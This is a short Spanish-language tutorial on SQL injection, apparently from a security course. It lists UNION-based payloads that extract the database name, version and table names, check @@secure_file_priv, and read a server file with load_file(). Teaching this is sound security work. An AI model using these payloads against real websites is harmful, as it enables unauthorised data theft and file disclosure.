SQL Injection

Es una de las más populares sino la más popular.

Una inyección SQL no es más que una inyección de código en el contexto de consultas SQL.

Introduciendo algún carácter que sabemos que si se inyecta este carácter en una consulta SQL por detrás en el backend, va a provocar un error cuando ejecute esta consulta sobre el motor de base de datos.

images/121-1.png

Tenemos otras formas también para cuando no salen estos mensajes de error.

Sabiendo esto podemos modificar la consulta o query SQL que realiza el servidor.

images/121-2.png

Podemos consultar otras cosas como el motor de base de datos que utiliza.


' union select null,database(),null,null,null,null,null --

images/121-3.png


' union select null,version(),null,null,null,null,null --

images/121-4.png


' union select null,table_name,null,null,null,null,null from information_schema.tables --

images/121-5.png

Hay veces que nuestra base de datos SQL nos va a permitir también acceder a ficheros que se encuentran en el sistema operativo.

La ruta a la que tiene acceso una base de datos mayor se cuele viene determinada por la siguiente variable.


' union select null,@@secure_file_priv,null,null,null,null,null --

images/121-6.png


' union select null,load_file('/var/lib/mysql-files/ficheroimportante.txt'),null,null,null,null,null --

images/121-7.png